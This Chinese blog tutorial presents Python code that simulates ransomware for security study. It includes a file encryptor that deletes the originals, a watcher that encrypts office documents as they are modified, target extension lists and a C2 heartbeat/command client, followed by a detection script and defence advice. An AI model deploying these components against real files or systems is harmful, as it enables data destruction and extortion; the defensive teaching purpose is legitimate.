手把手教你用Python模拟勒索病毒代码(仅供安全研究,附完整代码与注释)

张开发
2026/4/5 9:44:34 15 分钟阅读

最新文章

推荐文章

相关文章

分享文章

手把手教你用Python模拟勒索病毒代码(仅供安全研究,附完整代码与注释)
Python模拟勒索病毒代码解析防御视角的技术实践在网络安全领域理解攻击者的思维方式和工具运作原理是构建有效防御体系的关键。本文将从防御性学习的角度通过Python代码模拟勒索病毒的核心功能模块帮助安全研究人员和技术爱好者深入理解这类威胁的内部机制。我们将在完全隔离的沙箱环境中构建一个无害的教学演示程序重点剖析加密算法、文件操作和网络通信等关键技术点。1. 环境准备与安全声明在开始任何涉及安全研究的代码实验前确保工作环境的安全隔离是首要任务。推荐使用以下配置虚拟机环境VirtualBox或VMware创建的隔离系统网络设置禁用所有外部网络连接文件系统使用虚拟磁盘而非物理存储权限控制以普通用户身份运行实验代码重要提示本文所有代码仅供教育研究使用禁止在任何生产环境或未授权系统中运行。实际操作前请确认已签署组织内的安全研究授权协议。实验所需的基础Python库如下表所示库名称用途说明安全等级评估cryptography提供AES加密算法实现安全requests模拟C2服务器通信需监控watchdog文件系统监控安全hashlib文件哈希计算安全安装命令示例pip install cryptography requests watchdog --user2. 核心加密模块实现现代勒索软件通常采用混合加密体系我们通过Python模拟这一机制的关键部分。首先构建AES对称加密模块from cryptography.fernet import Fernet import os class EncryptionEngine: def __init__(self): self.key Fernet.generate_key() self.cipher Fernet(self.key) def encrypt_file(self, filepath): 模拟文件加密过程 try: with open(filepath, rb) as f: data f.read() encrypted self.cipher.encrypt(data) with open(filepath .encrypted, wb) as f: f.write(encrypted) os.remove(filepath) # 模拟原始文件删除 return True except Exception as e: print(f加密失败: {str(e)}) return False def decrypt_file(self, filepath): 用于研究恢复的解密方法 try: with open(filepath, rb) as f: data f.read() decrypted self.cipher.decrypt(data) with open(filepath.replace(.encrypted, ), wb) as f: f.write(decrypted) return True except Exception as e: print(f解密失败: {str(e)}) return False关键安全参数配置建议密钥长度至少256位加密模式CBC或GCM初始化向量(IV)每次加密随机生成密钥存储绝对禁止硬编码在代码中3. 文件系统操作模拟勒索病毒通常会扫描特定目录进行加密操作以下是安全研究用的模拟实现import fnmatch from watchdog.observers import Observer from watchdog.events import FileSystemEventHandler class TargetFileHandler(FileSystemEventHandler): def __init__(self, encryptor, patterns): self.encryptor encryptor self.patterns patterns def on_modified(self, event): if not event.is_directory: for pattern in self.patterns: if fnmatch.fnmatch(event.src_path, pattern): print(f检测到目标文件: {event.src_path}) self.encryptor.encrypt_file(event.src_path) def start_monitoring(path., patterns[*.docx, *.xlsx, *.pdf]): 启动文件监控仅用于研究 encryptor EncryptionEngine() event_handler TargetFileHandler(encryptor, patterns) observer Observer() observer.schedule(event_handler, path, recursiveTrue) observer.start() try: while True: time.sleep(1) except KeyboardInterrupt: observer.stop() observer.join()典型的目标文件扩展名列表文档类.doc,.docx,.pdf,.ppt数据类.xls,.xlsx,.csv,.sql媒体类.jpg,.psd,.ai,.mp4代码类.py,.java,.cpp,.js4. 模拟C2通信机制为理解攻击者的基础设施运作方式我们模拟基本的命令与控制通信import requests import json from datetime import datetime class C2Client: def __init__(self, server_url): self.server_url server_url self.machine_id self._generate_machine_id() def _generate_machine_id(self): 生成唯一设备标识模拟 import uuid return str(uuid.uuid4()) def send_heartbeat(self): 模拟心跳检测 payload { id: self.machine_id, timestamp: datetime.now().isoformat(), status: active } try: response requests.post( f{self.server_url}/heartbeat, datajson.dumps(payload), headers{Content-Type: application/json}, timeout5 ) return response.json() except Exception as e: print(f通信异常: {str(e)}) return None def get_command(self): 模拟命令获取 try: response requests.get( f{self.server_url}/command?id{self.machine_id}, timeout5 ) return response.json() except Exception as e: print(f命令获取失败: {str(e)}) return None常见C2服务器检测指标网络流量特征固定间隔的心跳包加密的HTTP/S通信非常规端口使用行为模式定期连接特定域名下载额外payload执行远程命令防御检测建议监控异常进程网络连接分析DNS请求模式部署网络层行为分析5. 防御技术与检测方案理解攻击手段后我们可以构建相应的防御策略。以下是基于行为的检测方案示例import psutil import hashlib from collections import defaultdict class RansomwareDetector: def __init__(self): self.file_operations defaultdict(int) self.crypto_processes set() def monitor_processes(self): 监控可疑进程行为 suspicious_criteria { high_file_io: 0, crypto_operations: 0, network_connections: 0 } for proc in psutil.process_iter([pid, name, cpu_percent]): try: io_counters proc.io_counters() if io_counters.write_bytes 1e8: # 100MB写入 suspicious_criteria[high_file_io] 1 if crypto in proc.name().lower(): suspicious_criteria[crypto_operations] 1 if len(proc.connections()) 5: suspicious_criteria[network_connections] 1 except (psutil.NoSuchProcess, psutil.AccessDenied): continue return suspicious_criteria def check_file_encryption(self, directory): 检测批量文件修改模式 extension_changes defaultdict(int) for root, _, files in os.walk(directory): for file in files: if file.endswith(.encrypted): original_ext os.path.splitext(file)[0].split(.)[-1] extension_changes[original_ext] 1 return dict(extension_changes)企业级防御策略矩阵防御层级技术措施实施示例预防应用程序白名单仅允许授权程序执行检测行为分析引擎监控异常文件操作模式响应自动隔离机制可疑进程立即终止并报警恢复备份验证系统定期测试备份可恢复性教育安全意识培训钓鱼邮件识别演练6. 研究伦理与合法边界在进行任何形式的安全研究时必须严格遵守以下伦理准则法律合规原则确保获得所有必要的授权绝对禁止影响真实系统和数据遵守当地网络安全法律法规研究范围限定仅在隔离环境测试使用模拟数据而非真实信息及时销毁实验产生的所有数据成果披露规范发现漏洞时遵循负责任的披露流程不公开可能被滥用的技术细节与行业共享防御方案而非攻击方法专业建议加入认可的漏洞研究计划如HackerOne或企业漏洞赏金计划将技术能力用于合法合规的安全改进。

更多文章